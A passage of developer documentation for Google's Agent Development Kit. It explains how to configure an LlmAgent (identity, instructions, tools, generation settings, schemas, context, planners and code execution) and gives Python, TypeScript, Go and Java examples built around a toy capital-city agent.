3: Post-Processing (runs after critic-reviser loop completes) Flowable postProcessingFlow = Flowable.defer(() -> { logger.log(Level.INFO, () -> String.format("[%s] Story state after loop: %s", name(), invocationContext.session().state().get("current_story"))); return runStage(sequentialAgent, invocationContext, "PostProcessing"); }); // Stage 4: Conditional Regeneration (runs after post-processing completes) Flowable conditionalRegenFlow = Flowable.defer(() -> { String toneCheckResult = (String) invocationContext.session().state().get("tone_check_result"); logger.log(Level.INFO, () -> String.format("[%s] Tone check result: %s", name(), toneCheckResult)); if ("negative".equalsIgnoreCase(toneCheckResult)) { logger.log(Level.INFO, () -> String.format("[%s] Tone is negative. Regenerating story...", name())); return runStage(storyGenerator, invocationContext, "StoryGenerator (Regen)"); } else { logger.log(Level.INFO, () -> String.format("[%s] Tone is not negative. Keeping current story.", name())); return Flowable.empty(); // No regeneration needed } }); return Flowable.concatArray(storyGenFlow, criticReviserFlow, postProcessingFlow, conditionalRegenFlow) .doOnComplete(() -> logger.log(Level.INFO, () -> String.format("[%s] Workflow finished.", name()))); } // Helper method for a single agent run stage with logging private Flowable runStage(BaseAgent agentToRun, InvocationContext ctx, String stageName) { logger.log(Level.INFO, () -> String.format("[%s] Running %s...", name(), stageName)); return agentToRun .runAsync(ctx) .doOnNext(event -> logger.log(Level.INFO,() -> String.format("[%s] Event from %s: %s", name(), stageName, event.toJson()))) .doOnError(err -> logger.log(Level.SEVERE, String.format("[%s] Error in %s", name(), stageName), err)) .doOnComplete(() -> logger.log(Level.INFO, () -> String.format("[%s] %s finished.", name(), stageName))); } @Override protected Flowable runLiveImpl(InvocationContext invocationContext) { return Flowable.error(new UnsupportedOperationException("runLive not implemented.")); } } ``` # LLM Agent Supported in ADK Python v0.1.0 Typescript v0.2.0 Go v0.1.0 Java v0.1.0 The `LlmAgent` (often aliased simply as `Agent`) is a core component in ADK, acting as the "thinking" part of your application. It leverages the power of a Large Language Model (LLM) for reasoning, understanding natural language, making decisions, generating responses, and interacting with tools. Unlike deterministic [Workflow Agents](https://google.github.io/adk-docs/agents/workflow-agents/index.md) that follow predefined execution paths, `LlmAgent` behavior is non-deterministic. It uses the LLM to interpret instructions and context, deciding dynamically how to proceed, which tools to use (if any), or whether to transfer control to another agent. Building an effective `LlmAgent` involves defining its identity, clearly guiding its behavior through instructions, and equipping it with the necessary tools and capabilities. ## Defining the Agent's Identity and Purpose First, you need to establish what the agent *is* and what it's *for*. - **`name` (Required):** Every agent needs a unique string identifier. This `name` is crucial for internal operations, especially in multi-agent systems where agents need to refer to or delegate tasks to each other. Choose a descriptive name that reflects the agent's function (e.g., `customer_support_router`, `billing_inquiry_agent`). Avoid reserved names like `user`. - **`description` (Optional, Recommended for Multi-Agent):** Provide a concise summary of the agent's capabilities. This description is primarily used by *other* LLM agents to determine if they should route a task to this agent. Make it specific enough to differentiate it from peers (e.g., "Handles inquiries about current billing statements," not just "Billing agent"). - **`model` (Required):** Specify the underlying LLM that will power this agent's reasoning. This is a string identifier like `"gemini-2.5-flash"`. The choice of model impacts the agent's capabilities, cost, and performance. See the [Models](/adk-docs/agents/models/) page for available options and considerations. ```python # Example: Defining the basic identity capital_agent = LlmAgent( model="gemini-2.5-flash", name="capital_agent", description="Answers user questions about the capital city of a given country." # instruction and tools will be added next ) ``` ```typescript // Example: Defining the basic identity const capitalAgent = new LlmAgent({ model: 'gemini-2.5-flash', name: 'capital_agent', description: 'Answers user questions about the capital city of a given country.', // instruction and tools will be added next }); ``` ```go // Example: Defining the basic identity agent, err := llmagent.New(llmagent.Config{ Name: "capital_agent", Model: model, Description: "Answers user questions about the capital city of a given country.", // instruction and tools will be added next }) ``` ```java // Example: Defining the basic identity LlmAgent capitalAgent = LlmAgent.builder() .model("gemini-2.5-flash") .name("capital_agent") .description("Answers user questions about the capital city of a given country.") // instruction and tools will be added next .build(); ``` ## Guiding the Agent: Instructions (`instruction`) The `instruction` parameter is arguably the most critical for shaping an `LlmAgent`'s behavior. It's a string (or a function returning a string) that tells the agent: - Its core task or goal. - Its personality or persona (e.g., "You are a helpful assistant," "You are a witty pirate"). - Constraints on its behavior (e.g., "Only answer questions about X," "Never reveal Y"). - How and when to use its `tools`. You should explain the purpose of each tool and the circumstances under which it should be called, supplementing any descriptions within the tool itself. - The desired format for its output (e.g., "Respond in JSON," "Provide a bulleted list"). **Tips for Effective Instructions:** - **Be Clear and Specific:** Avoid ambiguity. Clearly state the desired actions and outcomes. - **Use Markdown:** Improve readability for complex instructions using headings, lists, etc. - **Provide Examples (Few-Shot):** For complex tasks or specific output formats, include examples directly in the instruction. - **Guide Tool Use:** Don't just list tools; explain *when* and *why* the agent should use them. **State:** - The instruction is a string template, you can use the `{var}` syntax to insert dynamic values into the instruction. - `{var}` is used to insert the value of the state variable named var. - `{artifact.var}` is used to insert the text content of the artifact named var. - If the state variable or artifact does not exist, the agent will raise an error. If you want to ignore the error, you can append a `?` to the variable name as in `{var?}`. ```python # Example: Adding instructions capital_agent = LlmAgent( model="gemini-2.5-flash", name="capital_agent", description="Answers user questions about the capital city of a given country.", instruction="""You are an agent that provides the capital city of a country. When a user asks for the capital of a country: 1. Identify the country name from the user's query. 2. Use the `get_capital_city` tool to find the capital. 3. Respond clearly to the user, stating the capital city. Example Query: "What's the capital of {country}?" Example Response: "The capital of France is Paris." """, # tools will be added next ) ``` ```typescript // Example: Adding instructions const capitalAgent = new LlmAgent({ model: 'gemini-2.5-flash', name: 'capital_agent', description: 'Answers user questions about the capital city of a given country.', instruction: `You are an agent that provides the capital city of a country. When a user asks for the capital of a country: 1. Identify the country name from the user's query. 2. Use the \`getCapitalCity\` tool to find the capital. 3. Respond clearly to the user, stating the capital city. Example Query: "What's the capital of {country}?" Example Response: "The capital of France is Paris." `, // tools will be added next }); ``` ```go // Example: Adding instructions agent, err := llmagent.New(llmagent.Config{ Name: "capital_agent", Model: model, Description: "Answers user questions about the capital city of a given country.", Instruction: `You are an agent that provides the capital city of a country. When a user asks for the capital of a country: 1. Identify the country name from the user's query. 2. Use the 'get_capital_city' tool to find the capital. 3. Respond clearly to the user, stating the capital city. Example Query: "What's the capital of {country}?" Example Response: "The capital of France is Paris."`, // tools will be added next }) ``` ```java // Example: Adding instructions LlmAgent capitalAgent = LlmAgent.builder() .model("gemini-2.5-flash") .name("capital_agent") .description("Answers user questions about the capital city of a given country.") .instruction( """ You are an agent that provides the capital city of a country. When a user asks for the capital of a country: 1. Identify the country name from the user's query. 2. Use the `get_capital_city` tool to find the capital. 3. Respond clearly to the user, stating the capital city. Example Query: "What's the capital of {country}?" Example Response: "The capital of France is Paris." """) // tools will be added next .build(); ``` *(Note: For instructions that apply to* all *agents in a system, consider using `global_instruction` on the root agent, detailed further in the [Multi-Agents](https://google.github.io/adk-docs/agents/multi-agents/index.md) section.)* ## Equipping the Agent: Tools (`tools`) Tools give your `LlmAgent` capabilities beyond the LLM's built-in knowledge or reasoning. They allow the agent to interact with the outside world, perform calculations, fetch real-time data, or execute specific actions. - **`tools` (Optional):** Provide a list of tools the agent can use. Each item in the list can be: - A native function or method (wrapped as a `FunctionTool`). Python ADK automatically wraps the native function into a `FunctionTool` whereas, you must explicitly wrap your Java methods using `FunctionTool.create(...)` - An instance of a class inheriting from `BaseTool`. - An instance of another agent (`AgentTool`, enabling agent-to-agent delegation - see [Multi-Agents](https://google.github.io/adk-docs/agents/multi-agents/index.md)). The LLM uses the function/tool names, descriptions (from docstrings or the `description` field), and parameter schemas to decide which tool to call based on the conversation and its instructions. ```python # Define a tool function def get_capital_city(country: str) -> str: """Retrieves the capital city for a given country.""" # Replace with actual logic (e.g., API call, database lookup) capitals = {"france": "Paris", "japan": "Tokyo", "canada": "Ottawa"} return capitals.get(country.lower(), f"Sorry, I don't know the capital of {country}.") # Add the tool to the agent capital_agent = LlmAgent( model="gemini-2.5-flash", name="capital_agent", description="Answers user questions about the capital city of a given country.", instruction="""You are an agent that provides the capital city of a country... (previous instruction text)""", tools=[get_capital_city] # Provide the function directly ) ``` ```typescript import {z} from 'zod'; import { LlmAgent, FunctionTool } from '@google/adk'; // Define the schema for the tool's input parameters const getCapitalCityParamsSchema = z.object({ country: z.string().describe('The country to get capital for.'), }); // Define the tool function itself async function getCapitalCity(params: z.infer): Promise<{ capitalCity: string }> { const capitals: Record = { 'france': 'Paris', 'japan': 'Tokyo', 'canada': 'Ottawa', }; const result = capitals[params.country.toLowerCase()] ?? `Sorry, I don't know the capital of ${params.country}.`; return {capitalCity: result}; // Tools must return an object } // Create an instance of the FunctionTool const getCapitalCityTool = new FunctionTool({ name: 'getCapitalCity', description: 'Retrieves the capital city for a given country.', parameters: getCapitalCityParamsSchema, execute: getCapitalCity, }); // Add the tool to the agent const capitalAgent = new LlmAgent({ model: 'gemini-2.5-flash', name: 'capitalAgent', description: 'Answers user questions about the capital city of a given country.', instruction: 'You are an agent that provides the capital city of a country...', // Note: the full instruction is omitted for brevity tools: [getCapitalCityTool], // Provide the FunctionTool instance in an array }); ``` ```go // Define a tool function type getCapitalCityArgs struct { Country string `json:"country" jsonschema:"The country to get the capital of."` } getCapitalCity := func(ctx tool.Context, args getCapitalCityArgs) (map[string]any, error) { // Replace with actual logic (e.g., API call, database lookup) capitals := map[string]string{"france": "Paris", "japan": "Tokyo", "canada": "Ottawa"} capital, ok := capitals[strings.ToLower(args.Country)] if !ok { return nil, fmt.Errorf("Sorry, I don't know the capital of %s.", args.Country) } return map[string]any{"result": capital}, nil } // Add the tool to the agent capitalTool, err := functiontool.New( functiontool.Config{ Name: "get_capital_city", Description: "Retrieves the capital city for a given country.", }, getCapitalCity, ) if err != nil { log.Fatal(err) } agent, err := llmagent.New(llmagent.Config{ Name: "capital_agent", Model: model, Description: "Answers user questions about the capital city of a given country.", Instruction: "You are an agent that provides the capital city of a country... (previous instruction text)", Tools: []tool.Tool{capitalTool}, }) ``` ```java // Define a tool function // Retrieves the capital city of a given country. public static Map getCapitalCity( @Schema(name = "country", description = "The country to get capital for") String country) { // Replace with actual logic (e.g., API call, database lookup) Map countryCapitals = new HashMap<>(); countryCapitals.put("canada", "Ottawa"); countryCapitals.put("france", "Paris"); countryCapitals.put("japan", "Tokyo"); String result = countryCapitals.getOrDefault( country.toLowerCase(), "Sorry, I couldn't find the capital for " + country + "."); return Map.of("result", result); // Tools must return a Map } // Add the tool to the agent FunctionTool capitalTool = FunctionTool.create(experiment.getClass(), "getCapitalCity"); LlmAgent capitalAgent = LlmAgent.builder() .model("gemini-2.5-flash") .name("capital_agent") .description("Answers user questions about the capital city of a given country.") .instruction("You are an agent that provides the capital city of a country... (previous instruction text)") .tools(capitalTool) // Provide the function wrapped as a FunctionTool .build(); ``` Learn more about Tools in [Custom Tools](/adk-docs/tools-custom/). ## Advanced Configuration & Control Beyond the core parameters, `LlmAgent` offers several options for finer control: ### Fine-Tuning LLM Generation (`generate_content_config`) You can adjust how the underlying LLM generates responses using `generate_content_config`. - **`generate_content_config` (Optional):** Pass an instance of [`google.genai.types.GenerateContentConfig`](https://googleapis.github.io/python-genai/genai.html#genai.types.GenerateContentConfig) to control parameters like `temperature` (randomness), `max_output_tokens` (response length), `top_p`, `top_k`, and safety settings. ```python from google.genai import types agent = LlmAgent( # ... other params generate_content_config=types.GenerateContentConfig( temperature=0.2, # More deterministic output max_output_tokens=250, safety_settings=[ types.SafetySetting( category=types.HarmCategory.HARM_CATEGORY_DANGEROUS_CONTENT, threshold=types.HarmBlockThreshold.BLOCK_LOW_AND_ABOVE, ) ] ) ) ``` ```typescript import { GenerateContentConfig } from '@google/genai'; const generateContentConfig: GenerateContentConfig = { temperature: 0.2, // More deterministic output maxOutputTokens: 250, }; const agent = new LlmAgent({ // ... other params generateContentConfig, }); ``` ```go import "google.golang.org/genai" temperature := float32(0.2) agent, err := llmagent.New(llmagent.Config{ Name: "gen_config_agent", Model: model, GenerateContentConfig: &genai.GenerateContentConfig{ Temperature: &temperature, MaxOutputTokens: 250, }, }) ``` ```java import com.google.genai.types.GenerateContentConfig; LlmAgent agent = LlmAgent.builder() // ... other params .generateContentConfig(GenerateContentConfig.builder() .temperature(0.2F) // More deterministic output .maxOutputTokens(250) .build()) .build(); ``` ### Structuring Data (`input_schema`, `output_schema`, `output_key`) For scenarios requiring structured data exchange with an `LLM Agent`, the ADK provides mechanisms to define expected input and desired output formats using schema definitions. - **`input_schema` (Optional):** Define a schema representing the expected input structure. If set, the user message content passed to this agent *must* be a JSON string conforming to this schema. Your instructions should guide the user or preceding agent accordingly. - **`output_schema` (Optional):** Define a schema representing the desired output structure. If set, the agent's final response *must* be a JSON string conforming to this schema. - **`output_key` (Optional):** Provide a string key. If set, the text content of the agent's *final* response will be automatically saved to the session's state dictionary under this key. This is useful for passing results between agents or steps in a workflow. - In Python, this might look like: `session.state[output_key] = agent_response_text` - In Java: `session.state().put(outputKey, agentResponseText)` - In Golang, within a callback handler: `ctx.State().Set(output_key, agentResponseText)` The input and output schema is typically a `Pydantic` BaseModel. ```python from pydantic import BaseModel, Field class CapitalOutput(BaseModel): capital: str = Field(description="The capital of the country.") structured_capital_agent = LlmAgent( # ... name, model, description instruction="""You are a Capital Information Agent. Given a country, respond ONLY with a JSON object containing the capital. Format: {"capital": "capital_name"}""", output_schema=CapitalOutput, # Enforce JSON output output_key="found_capital" # Store result in state['found_capital'] # Cannot use tools=[get_capital_city] effectively here ) ``` ```typescript import {z} from 'zod'; import { Schema, Type } from '@google/genai'; // Define the schema for the output const CapitalOutputSchema: Schema = { type: Type.OBJECT, properties: { capital: { type: Type.STRING, description: 'The capital of the country.', }, }, required: ['capital'], }; // Create the LlmAgent instance const structuredCapitalAgent = new LlmAgent({ // ... name, model, description instruction: `You are a Capital Information Agent. Given a country, respond ONLY with a JSON object containing the capital. Format: {"capital": "capital_name"}`, outputSchema: CapitalOutputSchema, // Enforce JSON output outputKey: 'found_capital', // Store result in state['found_capital'] // Cannot use tools effectively here }); ``` The input and output schema is a `google.genai.types.Schema` object. ```go capitalOutput := &genai.Schema{ Type: genai.TypeObject, Description: "Schema for capital city information.", Properties: map[string]*genai.Schema{ "capital": { Type: genai.TypeString, Description: "The capital city of the country.", }, }, } agent, err := llmagent.New(llmagent.Config{ Name: "structured_capital_agent", Model: model, Description: "Provides capital information in a structured format.", Instruction: `You are a Capital Information Agent. Given a country, respond ONLY with a JSON object containing the capital. Format: {"capital": "capital_name"}`, OutputSchema: capitalOutput, OutputKey: "found_capital", // Cannot use the capitalTool tool effectively here }) ``` The input and output schema is a `google.genai.types.Schema` object. ```java private static final Schema CAPITAL_OUTPUT = Schema.builder() .type("OBJECT") .description("Schema for capital city information.") .properties( Map.of( "capital", Schema.builder() .type("STRING") .description("The capital city of the country.") .build())) .build(); LlmAgent structuredCapitalAgent = LlmAgent.builder() // ... name, model, description .instruction( "You are a Capital Information Agent. Given a country, respond ONLY with a JSON object containing the capital. Format: {\"capital\": \"capital_name\"}") .outputSchema(capitalOutput) // Enforce JSON output .outputKey("found_capital") // Store result in state.get("found_capital") // Cannot use tools(getCapitalCity) effectively here .build(); ``` ### Managing Context (`include_contents`) Control whether the agent receives the prior conversation history. - **`include_contents` (Optional, Default: `'default'`):** Determines if the `contents` (history) are sent to the LLM. - `'default'`: The agent receives the relevant conversation history. - `'none'`: The agent receives no prior `contents`. It operates based solely on its current instruction and any input provided in the *current* turn (useful for stateless tasks or enforcing specific contexts). ```python stateless_agent = LlmAgent( # ... other params include_contents='none' ) ``` ```typescript const statelessAgent = new LlmAgent({ // ... other params includeContents: 'none', }); ``` ```go import "google.golang.org/adk/agent/llmagent" agent, err := llmagent.New(llmagent.Config{ Name: "stateless_agent", Model: model, IncludeContents: llmagent.IncludeContentsNone, }) ``` ```java import com.google.adk.agents.LlmAgent.IncludeContents; LlmAgent statelessAgent = LlmAgent.builder() // ... other params .includeContents(IncludeContents.NONE) .build(); ``` ### Planner Supported in ADKPython v0.1.0 **`planner` (Optional):** Assign a `BasePlanner` instance to enable multi-step reasoning and planning before execution. There are two main planners: - **`BuiltInPlanner`:** Leverages the model's built-in planning capabilities (e.g., Gemini's thinking feature). See [Gemini Thinking](https://ai.google.dev/gemini-api/docs/thinking) for details and examples. Here, the `thinking_budget` parameter guides the model on the number of thinking tokens to use when generating a response. The `include_thoughts` parameter controls whether the model should include its raw thoughts and internal reasoning process in the response. ```python from google.adk import Agent from google.adk.planners import BuiltInPlanner from google.genai import types my_agent = Agent( model="gemini-2.5-flash", planner=BuiltInPlanner( thinking_config=types.ThinkingConfig( include_thoughts=True, thinking_budget=1024, ) ), # ... your tools here ) ``` - **`PlanReActPlanner`:** This planner instructs the model to follow a specific structure in its output: first create a plan, then execute actions (like calling tools), and provide reasoning for its steps. *It's particularly useful for models that don't have a built-in "thinking" feature*. ```python from google.adk import Agent from google.adk.planners import PlanReActPlanner my_agent = Agent( model="gemini-2.5-flash", planner=PlanReActPlanner(), # ... your tools here ) ``` The agent's response will follow a structured format: ```text [user]: ai news [google_search_agent]: /*PLANNING*/ 1. Perform a Google search for "latest AI news" to get current updates and headlines related to artificial intelligence. 2. Synthesize the information from the search results to provide a summary of recent AI news. /*ACTION*/ /*REASONING*/ The search results provide a comprehensive overview of recent AI news, covering various aspects like company developments, research breakthroughs, and applications. I have enough information to answer the user's request. /*FINAL_ANSWER*/ Here's a summary of recent AI news: .... ``` Example for using built-in-planner: ```python from dotenv import load_dotenv import asyncio import os from google.genai import types from google.adk.agents.llm_agent import LlmAgent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.adk.artifacts.in_memory_artifact_service import InMemoryArtifactService # Optional from google.adk.planners import BasePlanner, BuiltInPlanner, PlanReActPlanner from google.adk.models import LlmRequest from google.genai.types import ThinkingConfig from google.genai.types import GenerateContentConfig import datetime from zoneinfo import ZoneInfo APP_NAME = "weather_app" USER_ID = "1234" SESSION_ID = "session1234" def get_weather(city: str) -> dict: """Retrieves the current weather report for a specified city. Args: city (str): The name of the city for which to retrieve the weather report. Returns: dict: status and result or error msg. """ if city.lower() == "new york": return { "status": "success", "report": ( "The weather in New York is sunny with a temperature of 25 degrees" " Celsius (77 degrees Fahrenheit)." ), } else: return { "status": "error", "error_message": f"Weather information for '{city}' is not available.", } def get_current_time(city: str) -> dict: """Returns the current time in a specified city. Args: city (str): The name of the city for which to retrieve the current time. Returns: dict: status and result or error msg. """ if city.lower() == "new york": tz_identifier = "America/New_York" else: return { "status": "error", "error_message": ( f"Sorry, I don't have timezone information for {city}." ), } tz = ZoneInfo(tz_identifier) now = datetime.datetime.now(tz) report = ( f'The current time in {city} is {now.strftime("%Y-%m-%d %H:%M:%S %Z%z")}' ) return {"status": "success", "report": report} # Step 1: Create a ThinkingConfig thinking_config = ThinkingConfig( include_thoughts=True, # Ask the model to include its thoughts in the response thinking_budget=256 # Limit the 'thinking' to 256 tokens (adjust as needed) ) print("ThinkingConfig:", thinking_config) # Step 2: Instantiate BuiltInPlanner planner = BuiltInPlanner( thinking_config=thinking_config ) print("BuiltInPlanner created.") # Step 3: Wrap the planner in an LlmAgent agent = LlmAgent( model="gemini-2.5-pro-preview-03-25", # Set your model name name="weather_and_time_agent", instruction="You are an agent that returns time and weather", planner=planner, tools=[get_weather, get_current_time] ) # Session and Runner session_service = InMemorySessionService() session = session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) runner = Runner(agent=agent, app_name=APP_NAME, session_service=session_service) # Agent Interaction def call_agent(query): content = types.Content(role='user', parts=[types.Part(text=query)]) events = runner.run(user_id=USER_ID, session_id=SESSION_ID, new_message=content) for event in events: print(f"\nDEBUG EVENT: {event}\n") if event.is_final_response() and event.content: final_answer = event.content.parts[0].text.strip() print("\n🟢 FINAL ANSWER\n", final_answer, "\n") call_agent("If it's raining in New York right now, what is the current temperature?") ``` ### Code Execution Supported in ADKPython v0.1.0Java v0.1.0 - **`code_executor` (Optional):** Provide a `BaseCodeExecutor` instance to allow the agent to execute code blocks found in the LLM's response. For more information, see [Code Execution with Gemini API](/adk-docs/tools/gemini-api/code-execution/). ````python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import asyncio from google.adk.agents import LlmAgent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.adk.code_executors import BuiltInCodeExecutor from google.genai import types AGENT_NAME = "calculator_agent" APP_NAME = "calculator" USER_ID = "user1234" SESSION_ID = "session_code_exec_async" GEMINI_MODEL = "gemini-2.0-flash" # Agent Definition code_agent = LlmAgent( name=AGENT_NAME, model=GEMINI_MODEL, code_executor=BuiltInCodeExecutor(), instruction="""You are a calculator agent. When given a mathematical expression, write and execute Python code to calculate the result. Return only the final numerical result as plain text, without markdown or code blocks. """, description="Executes Python code to perform calculations.", ) # Session and Runner session_service = InMemorySessionService() session = asyncio.run(session_service.create_session( app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID )) runner = Runner(agent=code_agent, app_name=APP_NAME, session_service=session_service) # Agent Interaction (Async) async def call_agent_async(query): content = types.Content(role="user", parts=[types.Part(text=query)]) print(f"\n--- Running Query: {query} ---") final_response_text = "No final text response captured." try: # Use run_async async for event in runner.run_async( user_id=USER_ID, session_id=SESSION_ID, new_message=content ): print(f"Event ID: {event.id}, Author: {event.author}") # --- Check for specific parts FIRST --- has_specific_part = False if event.content and event.content.parts: for part in event.content.parts: # Iterate through all parts if part.executable_code: # Access the actual code string via .code print( f" Debug: Agent generated code:\n```python\n{part.executable_code.code}\n```" ) has_specific_part = True elif part.code_execution_result: # Access outcome and output correctly print( f" Debug: Code Execution Result: {part.code_execution_result.outcome} - Output:\n{part.code_execution_result.output}" ) has_specific_part = True # Also print any text parts found in any event for debugging elif part.text and not part.text.isspace(): print(f" Text: '{part.text.strip()}'") # Do not set has_specific_part=True here, as we want the final response logic below # --- Check for final response AFTER specific parts --- # Only consider it final if it doesn't have the specific code parts we just handled if not has_specific_part and event.is_final_response(): if ( event.content and event.content.parts and event.content.parts[0].text ): final_response_text = event.content.parts[0].text.strip() print(f"==> Final Agent Response: {final_response_text}") else: print( "==> Final Agent Response: [No text content in final event]") except Exception as e: print(f"ERROR during agent run: {e}") print("-" * 30) # Main async function to run the examples async def main(): await call_agent_async("Calculate the value of (5 + 7) * 3") await call_agent_async("What is 10 factorial?") # Execute the main async function try: asyncio.run(main()) except RuntimeError as e: # Handle specific error when running asyncio.run in an already running loop (like Jupyter/Colab) if "cannot be called from a running event loop" in str(e): print("\nRunning in an existing event loop (like Colab/Jupyter).") print("Please run `await main()` in a notebook cell instead.") # If in an interactive environment like a notebook, you might need to run: # await main() else: raise e # Re-raise other runtime errors ```` ````java import com.google.adk.agents.BaseAgent; import com.google.adk.agents.LlmAgent; import com.google.adk.runner.Runner; import com.google.adk.sessions.InMemorySessionService; import com.google.adk.sessions.Session; import com.google.adk.tools.BuiltInCodeExecutionTool; import com.google.common.collect.ImmutableList; import com.google.genai.types.Content; import com.google.genai.types.Part; public class CodeExecutionAgentApp { private static final String AGENT_NAME = "calculator_agent"; private static final String APP_NAME = "calculator"; private static final String USER_ID = "user1234"; private static final String SESSION_ID = "session_code_exec_sync"; private static final String GEMINI_MODEL = "gemini-2.0-flash"; /** * Calls the agent with a query and prints the interaction events and final response. * * @param runner The runner instance for the agent. * @param query The query to send to the agent. */ public static void callAgent(Runner runner, String query) { Content content = Content.builder().role("user").parts(ImmutableList.of(Part.fromText(query))).build(); InMemorySessionService sessionService = (InMemorySessionService) runner.sessionService(); Session session = sessionService .createSession(APP_NAME, USER_ID, /* state= */ null, SESSION_ID) .blockingGet(); System.out.println("\n--- Running Query: " + query + " ---"); final String[] finalResponseText = {"No final text response captured."}; try { runner .runAsync(session.userId(), session.id(), content) .forEach( event -> { System.out.println("Event ID: " + event.id() + ", Author: " + event.author()); boolean hasSpecificPart = false; if (event.content().isPresent() && event.content().get().parts().isPresent()) { for (Part part : event.content().get().parts().get()) { if (part.executableCode().isPresent()) { System.out.println( " Debug: Agent generated code:\n```python\n" + part.executableCode().get().code() + "\n```"); hasSpecificPart = true; } else if (part.codeExecutionResult().isPresent()) { System.out.println( " Debug: Code Execution Result: " + part.codeExecutionResult().get().outcome() + " - Output:\n" + part.codeExecutionResult().get().output()); hasSpecificPart = true; } else if (part.text().isPresent() && !part.text().get().trim().isEmpty()) { System.out.println(" Text: '" + part.text().get().trim() + "'"); } } } if (!hasSpecificPart && event.finalResponse()) { if (event.content().isPresent() && event.content().get().parts().isPresent() && !event.content().get().parts().get().isEmpty() && event.content().get().parts().get().get(0).text().isPresent()) { finalResponseText[0] = event.content().get().parts().get().get(0).text().get().trim(); System.out.println("==> Final Agent Response: " + finalResponseText[0]); } else { System.out.println( "==> Final Agent Response: [No text content in final event]"); } } }); } catch (Exception e) { System.err.println("ERROR during agent run: " + e.getMessage()); e.printStackTrace(); } System.out.println("------------------------------"); } public static void main(String[] args) { BuiltInCodeExecutionTool codeExecutionTool = new BuiltInCodeExecutionTool(); BaseAgent codeAgent = LlmAgent.builder() .name(AGENT_NAME) .model(GEMINI_MODEL) .tools(ImmutableList.of(codeExecutionTool)) .instruction( """ You are a calculator agent. When given a mathematical expression, write and execute Python code to calculate the result. Return only the final numerical result as plain text, without markdown or code blocks. """) .description("Executes Python code to perform calculations.") .build(); InMemorySessionService sessionService = new InMemorySessionService(); Runner runner = new Runner(codeAgent, APP_NAME, null, sessionService); callAgent(runner, "Calculate the value of (5 + 7) * 3"); callAgent(runner, "What is 10 factorial?"); } } ```` ## Putting It Together: Example Code Here's the complete basic `capital_agent`: ```python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # --- Full example code demonstrating LlmAgent with Tools vs. Output Schema --- import json # Needed for pretty printing dicts import asyncio from google.adk.agents import LlmAgent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.genai import types from pydantic import BaseModel, Field # --- 1. Define Constants --- APP_NAME = "agent_comparison_app" USER_ID = "test_user_456" SESSION_ID_TOOL_AGENT = "session_tool_agent_xyz" SESSION_ID_SCHEMA_AGENT = "session_schema_agent_xyz" MODEL_NAME = "gemini-2.0-flash" # --- 2. Define Schemas --- # Input schema used by both agents class CountryInput(BaseModel): country: str = Field(description="The country to get information about.") # Output schema ONLY for the second agent class CapitalInfoOutput(BaseModel): capital: str = Field(description="The capital city of the country.") # Note: Population is illustrative; the LLM will infer or estimate this # as it cannot use tools when output_schema is set. population_estimate: str = Field(description="An estimated population of the capital city.") # --- 3. Define the Tool (Only for the first agent) --- def get_capital_city(country: str) -> str: """Retrieves the capital city of a given country.""" print(f"\n-- Tool Call: get_capital_city(country='{country}') --") country_capitals = { "united states": "Washington, D.C.", "canada": "Ottawa", "france": "Paris", "japan": "Tokyo", } result = country_capitals.get(country.lower(), f"Sorry, I couldn't find the capital for {country}.") print(f"-- Tool Result: '{result}' --") return result # --- 4. Configure Agents --- # Agent 1: Uses a tool and output_key capital_agent_with_tool = LlmAgent( model=MODEL_NAME, name="capital_agent_tool", description="Retrieves the capital city using a specific tool.", instruction="""You are a helpful agent that provides the capital city of a country using a tool. The user will provide the country name in a JSON format like {"country": "country_name"}. 1. Extract the country name. 2. Use the `get_capital_city` tool to find the capital. 3. Respond clearly to the user, stating the capital city found by the tool. """, tools=[get_capital_city], input_schema=CountryInput, output_key="capital_tool_result", # Store final text response ) # Agent 2: Uses output_schema (NO tools possible) structured_info_agent_schema = LlmAgent( model=MODEL_NAME, name="structured_info_agent_schema", description="Provides capital and estimated population in a specific JSON format.", instruction=f"""You are an agent that provides country information. The user will provide the country name in a JSON format like {{"country": "country_name"}}. Respond ONLY with a JSON object matching this exact schema: {json.dumps(CapitalInfoOutput.model_json_schema(), indent=2)} Use your knowledge to determine the capital and estimate the population. Do not use any tools. """, # *** NO tools parameter here - using output_schema prevents tool use *** input_schema=CountryInput, output_schema=CapitalInfoOutput, # Enforce JSON output structure output_key="structured_info_result", # Store final JSON response ) # --- 5. Set up Session Management and Runners --- session_service = InMemorySessionService() # Create a runner for EACH agent capital_runner = Runner( agent=capital_agent_with_tool, app_name=APP_NAME, session_service=session_service ) structured_runner = Runner( agent=structured_info_agent_schema, app_name=APP_NAME, session_service=session_service ) # --- 6. Define Agent Interaction Logic --- async def call_agent_and_print( runner_instance: Runner, agent_instance: LlmAgent, session_id: str, query_json: str ): """Sends a query to the specified agent/runner and prints results.""" print(f"\n>>> Calling Agent: '{agent_instance.name}' | Query: {query_json}") user_content = types.Content(role='user', parts=[types.Part(text=query_json)]) final_response_content = "No final response received." async for event in runner_instance.run_async(user_id=USER_ID, session_id=session_id, new_message=user_content): # print(f"Event: {event.type}, Author: {event.author}") # Uncomment for detailed logging if event.is_final_response() and event.content and event.content.parts: # For output_schema, the content is the JSON string itself final_response_content = event.content.parts[0].text print(f"<<< Agent '{agent_instance.name}' Response: {final_response_content}") current_session = await session_service.get_session(app_name=APP_NAME, user_id=USER_ID, session_id=session_id) stored_output = current_session.state.get(agent_instance.output_key) # Pretty print if the stored output looks like JSON (likely from output_schema) print(f"--- Session State ['{agent_instance.output_key}']: ", end="") try: # Attempt to parse and pretty print if it's JSON parsed_output = json.loads(stored_output) 